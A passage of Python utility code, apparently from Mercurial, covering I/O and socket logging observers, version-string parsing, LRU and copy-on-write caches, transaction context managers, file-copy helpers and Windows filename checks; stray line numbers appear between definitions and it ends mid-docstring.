        # happen _a lot_ on Python 3, and there doesn't seem to be a better
        # workaround to have matching Python 2 and 3 behavior. :(
        if size == -1 and payload == b'':
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> read(%d) -> %d' % (self.name, size, len(payload))
            )

        self._writedata(payload)

    def readline(self, res, limit=-1):
        """Log a ``readline()`` call that returned ``res``."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        """Log a ``readinto(dest)`` call that returned ``res``."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
            )

        if res is None:
            filled = b''
        else:
            filled = dest[0:res]

        # _writedata() uses "in" operator and is confused by memoryview
        # because characters are ints on Python 3.
        if isinstance(filled, memoryview):
            filled = filled.tobytes()

        self._writedata(filled)

    def write(self, res, data):
        """Log a ``write(data)`` call that returned ``res``."""
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3
        # (reasonably) returns the integer bytes written.
        written = len(data) if (res is None and data) else res

        if self.logdataapis:
            self.fh.write(
                b'%s> write(%d) -> %r' % (self.name, len(data), written)
            )

        self._writedata(data)

    def flush(self, res):
        """Log a ``flush()`` call that returned ``res``."""
        if not self.writes:
            return

        self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        """Log a buffered ``read(size)`` that returned ``res``."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
            )

        self._writedata(res)

    def bufferedreadline(self, res):
        """Log a buffered ``readline()`` that returned ``res``."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedreadline() -> %d' % (self.name, len(res))
            )

        self._writedata(res)
955
955
956
956
def makeloggingfileobject(
    logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
):
    """Wrap file object ``fh`` so that its activity is logged to ``logh``.

    A ``fileobjectobserver`` is built from ``logh``, ``name`` and the
    logging flags, and a ``fileobjectproxy`` around ``fh`` using that
    observer is returned.
    """
    return fileobjectproxy(
        fh,
        fileobjectobserver(
            logh,
            name,
            reads=reads,
            writes=writes,
            logdata=logdata,
            logdataapis=logdataapis,
        ),
    )
971
971
972
972
class socketobserver(baseproxyobserver):
    """Logs socket activity.

    Every method takes the return value of the observed socket call as
    ``res`` followed by the arguments that were passed to that call.
    ``reads``, ``writes`` and ``states`` switch logging of receive calls,
    send calls and state-changing calls on or off.
    """

    def __init__(
        self,
        fh,
        name,
        reads=True,
        writes=True,
        states=True,
        logdata=False,
        logdataapis=True,
    ):
        super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
        self.reads = reads
        self.writes = writes
        self.states = states

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
            )
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        # res is indexed as a sequence whose first item is the data.
        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom(%d, %d) -> %d'
                % (self.name, size, flags, len(res[0]))
            )

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size=0, flags=0):
        # ``size`` is optional on socket.recvfrom_into(), so it needs a
        # default here or observing the one-argument form raises TypeError.
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom_into(%d, %d) -> %d'
                % (self.name, size, flags, res[0])
            )

        data = buf[0 : res[0]]
        # _writedata() uses the "in" operator, which does not find newlines
        # in a memoryview because its items are ints on Python 3.
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
            )

        data = buf[0:res]
        # Same memoryview handling as in recvfrom_into().
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        # socket.send() returns the number of bytes sent, so ``res`` is
        # logged directly; taking len() of it raises TypeError.
        if self.logdataapis:
            self.fh.write(
                b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, res)
            )
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write(
                b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
            )

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        # socket.sendto() accepts (data, address) or (data, flags, address).
        if address:
            flags = flagsoraddress
        else:
            # Two-argument form: the second argument is the address.
            flags = 0
            address = flagsoraddress

        if self.logdataapis:
            self.fh.write(
                b'%s> sendto(%d, %d, %r) -> %d'
                % (self.name, len(data), flags, address, res)
            )

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        # socket.gettimeout() returns None when no timeout is set, and
        # None cannot be formatted with %f.
        if res is None:
            self.fh.write(b'%s> gettimeout() -> None\n' % (self.name,))
        else:
            self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write(
            b'%s> setsockopt(%r, %r, %r) -> %r\n'
            % (self.name, level, optname, value, res)
        )
1106
1106
1107
1107
def makeloggingsocket(
    logh,
    fh,
    name,
    reads=True,
    writes=True,
    states=True,
    logdata=False,
    logdataapis=True,
):
    """Wrap socket ``fh`` so that its activity is logged to ``logh``.

    A ``socketobserver`` is built from ``logh``, ``name`` and the logging
    flags, and a ``socketproxy`` around ``fh`` using that observer is
    returned.
    """
    return socketproxy(
        fh,
        socketobserver(
            logh,
            name,
            reads=reads,
            writes=writes,
            states=states,
            logdata=logdata,
            logdataapis=logdataapis,
        ),
    )
1130
1130
1131
1131
def version():
    """Return the ``version`` attribute of the sibling ``__version__`` module.

    Falls back to ``b'unknown'`` when an ``ImportError`` is raised.
    """
    try:
        from . import __version__ as versionmod

        # The attribute is read inside the ``try`` so that an ImportError
        # raised while resolving it is handled like a failed import.
        found = versionmod.version
    except ImportError:
        found = b'unknown'
    return found
1140
1140
1141
1141
def versiontuple(v=None, n=4):
    """Split a Mercurial version string into an N-tuple.

    ``v`` is the version string to parse; when it is empty or not given,
    the string returned by ``version()`` is used instead.

    ``n`` can be 2, 3, or 4 and selects how many leading fields are
    returned. Missing numeric fields are ``None``. Here is how some version
    strings map to returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()

    # Up to three dot-separated numbers, an optional '+' or '-' separator,
    # and then everything else.
    matched = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
    if matched is None:
        # No leading number at all: the whole string is the extra part.
        vparts, extra = b'', v
    else:
        vparts = matched.group(1)
        # An empty remainder is reported as None rather than b''.
        extra = matched.group(2) or None

    assert vparts is not None  # help pytype

    numbers = []
    for piece in vparts.split(b'.'):
        try:
            numbers.append(int(piece))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    numbers.extend([None] * (3 - len(numbers)))

    fields = (numbers[0], numbers[1], numbers[2], extra)
    if n == 2:
        return fields[:2]
    if n == 3:
        return fields[:3]
    if n == 4:
        return fields
1225
1225
1226
1226
def cachefunc(func):
    """cache the result of function calls

    Returns a wrapper around ``func`` that remembers every result it has
    computed, keyed by the positional arguments of the call. Entries are
    never evicted, and the arguments must be hashable.

    Functions taking no arguments, or exactly one, get a specialized wrapper
    that avoids packing and unpacking an argument tuple.
    """
    # XXX doesn't handle keywords args
    code = func.__code__
    argcount = code.co_argcount
    # 0x04 is CO_VARARGS: the function accepts *args. co_argcount does not
    # count *args, so such functions must use the generic wrapper below.
    hasvarargs = bool(code.co_flags & 0x04)

    if argcount == 0 and not hasvarargs:
        # a list is used so that a None result can be cached as well
        listcache = []

        def f():
            if len(listcache) == 0:
                listcache.append(func())
            return listcache[0]

        return f
    cache = {}
    if argcount == 1 and not hasvarargs:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]

    else:

        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f
1256
1256
1257
1257
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.

    The class keeps a ``_copied`` counter on the instance: ``copy()`` bumps
    it and hands back the very same object, while ``preparewrite()`` consumes
    one count and returns a real copy built with ``self.__class__(self)``.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            # an outstanding cheap copy still shares this object: give the
            # writer a fresh object instead of mutating the shared one
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        # _copied may not exist yet; it is created lazily on first copy
        self._copied = getattr(self, '_copied', 0) + 1
        return self
1275
1275
1276
1276
class sortdict(collections.OrderedDict):
    """a simple sorted dictionary

    Keys are kept in last-set order: assigning to an existing key moves it
    to the end.

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    >>> d1.insert(1, b'a.5', 0.5)
    >>> d1
    sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
    """

    def __setitem__(self, key, value):
        # drop any existing entry first so the key is re-added at the end
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src=(), **f):
            """Set every item of ``src`` and then of ``f`` via __setitem__.

            ``src`` may be a dict or an iterable of (key, value) pairs; like
            dict.update() it may be omitted when only keywords are given.
            """
            if isinstance(src, dict):
                src = pycompat.iteritems(src)
            for k, v in src:
                self[k] = v
            for k in f:
                self[k] = f[k]

    def insert(self, position, key, value):
        """Insert ``key`` so that it ends up at index ``position``.

        Items currently at ``position`` and later are re-set after the new
        key, which moves them behind it. A ``position`` at or past the
        current length appends the item.
        """
        items = list(self.items())
        for (i, (k, v)) in enumerate(items):
            if i == position:
                self[key] = value
            if i >= position:
                del self[k]
                self[k] = v
        if position >= len(items):
            # the loop above never reached ``position`` (this includes the
            # empty dict), so the new item simply goes last
            self[key] = value
1312
1314
1313
1315
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
1339
1341
1340
1342
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
1346
1348
1347
1349
class transactional(object):  # pytype: disable=ignored-metaclass
    """Base class for making a transactional type into a context manager.

    Subclasses provide close() and release(). Leaving the ``with`` block
    without an exception calls close() and then release(); leaving it with
    an exception calls release() only. The exception is not suppressed.
    """

    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            # release() runs even if close() itself raised
            self.release()
1373
1375
1374
1376
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns

    With a transaction, the body is run and then ``tr.close()`` is called.
    If the body raises ``error.InterventionRequired`` the transaction is
    closed as well and the exception is re-raised. ``tr.release()`` is
    always called on the way out.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # keep what was done so far, then let the caller see the exception
        tr.close()
        raise
    finally:
        tr.release()
1392
1394
1393
1395
@contextlib.contextmanager
def nullcontextmanager(enter_result=None):
    """A context manager that does nothing and yields ``enter_result``."""
    yield enter_result
1397
1399
1398
1400
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.

    An empty node has ``key`` set to the ``_notset`` sentinel, ``value`` set
    to None and a ``cost`` of 0.
    """

    __slots__ = ('next', 'prev', 'key', 'value', 'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        # the next/prev links are left alone: the node stays in the list
        self.key = _notset
        self.value = None
        self.cost = 0
1421
1423
1422
1424
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new node. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """

    def __init__(self, max, maxcost=0):
        """Create a cache holding at most ``max`` entries.

        ``maxcost`` is the total cost limit; a false value (the default 0)
        disables cost enforcement.
        """
        self._cache = {}

        # the list starts out as a single empty node linked to itself
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            self.totalcost -= node.cost
            del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        """Remove ``k`` and return its value.

        Returns ``default`` if the key is missing and a default was given,
        otherwise re-raises the KeyError.
        """
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default

        assert node is not None  # help pytype
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        """Return the value for ``k`` (marking it newest) or ``default``."""
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that it doesn't mean peek() is thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        """Empty the cache; the allocated nodes are kept for reuse."""
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        Returns None if the cache is empty.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        assert n is not None  # help pytype

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # A.prev = N
        node.next.prev = node
        # E.next = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        """Evict the oldest entries while the total cost is over the limit."""
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev
1719
1721
1720
1722
def lrucachefunc(func):
    """cache most recent results of function calls

    Returns a wrapper around ``func`` that keeps a small number of results
    keyed by the positional arguments. Once more than 20 results are held,
    the least recently used one is dropped before a new one is stored.
    Arguments must be hashable; keyword arguments are not supported.
    """
    cache = {}
    # keys ordered from least to most recently used
    order = collections.deque()
    if func.__code__.co_argcount == 1:

        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                # a hit: take the key out so it can be re-added as newest
                order.remove(arg)
            order.append(arg)
            return cache[arg]

    else:

        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f
1750
1752
1751
1753
class propertycache(object):
    """Decorator turning a method into an attribute computed on first access.

    The computed value is stored in the instance ``__dict__`` under the
    method's name, so later lookups find it there and do not reach this
    descriptor again.
    """

    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        """Store ``value`` as the cached result on ``obj``."""
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1765
1767
1766
1768
def clearcachedproperty(obj, prop):
    """clear a cached property value, if one has been set

    ``prop`` is converted with pycompat.sysstr() before it is looked up in
    ``obj.__dict__``. Nothing happens if no value is stored under that name.
    """
    prop = pycompat.sysstr(prop)
    if prop in obj.__dict__:
        del obj.__dict__[prop]
1772
1774
1773
1775
def increasingchunks(source, min=1024, max=65536):
    """return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max

    ``source`` is an iterable of bytes chunks. Incoming chunks are buffered
    and joined until at least ``min`` bytes are available. Whatever is left
    in the buffer when ``source`` is exhausted is yielded as a final,
    possibly shorter, chunk.
    """

    def log2(x):
        # position of the highest set bit; 0 for an input of 0
        if not x:
            return 0
        return x.bit_length() - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                # jump straight to the largest power of two not above what
                # was just buffered when that is bigger than the doubled min
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield b''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield b''.join(buf)
1805
1807
1806
1808
def always(fn):
    """Return True regardless of ``fn``."""
    return True
1809
1811
1810
1812
def never(fn):
    """Return False regardless of ``fn``."""
    return False
1813
1815
1814
1816
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.

    Returns a wrapper that calls ``func`` with the collector disabled and
    re-enables it afterwards if it was enabled on entry.
    """

    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # only turn the collector back on if it was on to begin with
            if gcenabled:
                gc.enable()

    return wrapper
1839
1841
1840
1842
if pycompat.ispypy:
    # PyPy runs slower with gc disabled, so there the decorator is replaced
    # by a pass-through that hands the function back unchanged
    nogc = lambda x: x
1844
1846
1845
1847
def pathto(root, n1, n2):
    # type: (bytes, bytes, bytes) -> bytes
    """return the relative path from one place to another.

    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    """
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        rootdrive = os.path.splitdrive(root)[0]
        if rootdrive != os.path.splitdrive(n1)[0]:
            # different drives: no relative path exists between them
            return os.path.join(root, localpath(n2))
        n2 = b'/'.join((pconvert(root), n2))
    fromparts = splitpath(n1)
    toparts = n2.split(b'/')
    # count the leading components both paths have in common
    shared = 0
    while (
        shared < len(fromparts)
        and shared < len(toparts)
        and fromparts[shared] == toparts[shared]
    ):
        shared += 1
    # climb out of what is left of n1, then descend into what is left of n2
    climb = [b'..'] * (len(fromparts) - shared)
    return pycompat.ossep.join(climb + toparts[shared:]) or b'.'
1872
1874
1873
1875
def checksignature(func, depth=1):
    """Wrap ``func`` so that calling errors are reported distinctly.

    A TypeError whose traceback is exactly ``depth`` frames long is
    replaced by error.SignatureError; any other TypeError is re-raised
    unchanged.
    """

    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) != depth:
                raise
            raise error.SignatureError

    return check
1886
1888
1887
1889
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    b'apfs',
    b'btrfs',
    b'ext2',
    b'ext3',
    b'ext4',
    b'hfs',
    b'jfs',
    b'NTFS',
    b'reiserfs',
    b'tmpfs',
    b'ufs',
    b'xfs',
    b'zfs',
}
1904
1906
1905
1907
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    """copy a file, preserving mode and optionally other stat info like
    atime/mtime

    An existing dest is removed first. With hardlink, a hardlink is
    attempted when dest's directory is on a whitelisted filesystem, and a
    regular copy is the fallback. A symlink src is recreated as a symlink.

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    """
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # keep the stat of the file being replaced for the check below
            oldstat = filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        hardlink = fstype in _hardlinkfswhitelist
    if hardlink:
        try:
            oslink(src, dest)
        except (IOError, OSError):
            pass  # fall back to normal copy
        else:
            return
    if os.path.islink(src):
        # copystat is ignored for symlinks, but in general it isn't needed
        # for them anyway
        os.symlink(os.readlink(src), dest)
        return
    try:
        shutil.copyfile(src, dest)
        if copystat:
            # copystat also copies mode
            shutil.copystat(src, dest)
        else:
            shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
                    os.utime(dest, (advanced, advanced))
    except shutil.Error as inst:
        raise error.Abort(stringutil.forcebytestr(inst))
1959
1961
1960
1962
def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible.

    When hardlink is None, linking is tried if the source and the parent
    of dst report the same st_dev. Returns a ``(hardlink, num)`` pair: the
    hardlink setting after the copy (False once a link attempt has failed)
    and the number of files copied or linked.
    """
    total = 0

    def settopic():
        if progress:
            progress.topic = _(b'linking') if hardlink else _(b'copying')

    dstparent = os.path.dirname(dst)
    if os.path.isdir(src):
        if hardlink is None:
            hardlink = os.stat(src).st_dev == os.stat(dstparent).st_dev
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            hardlink, copied = copyfiles(
                os.path.join(src, name),
                os.path.join(dst, name),
                hardlink,
                progress,
            )
            total += copied
    else:
        if hardlink is None:
            srcparent = os.path.dirname(src)
            hardlink = os.stat(srcparent).st_dev == os.stat(dstparent).st_dev
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # stop trying to link for the rest of the tree
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        total += 1
        if progress:
            progress.increment()

    return hardlink, total
2002
2004
2003
2005
# device names that Windows reserves (compared in lower case)
_winreservednames = {b'con', b'prn', b'aux', b'nul'}
# com1..com9 and lpt1..lpt9
_winreservednames.update(b'com%d' % port for port in range(1, 10))
_winreservednames.update(b'lpt%d' % port for port in range(1, 10))
# characters that may not appear in a Windows filename
_winreservedchars = b':*?"<>|'
2029
2031
2030
2032
def checkwinfilename(path):
    # type: (bytes) -> Optional[bytes]
    r"""Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
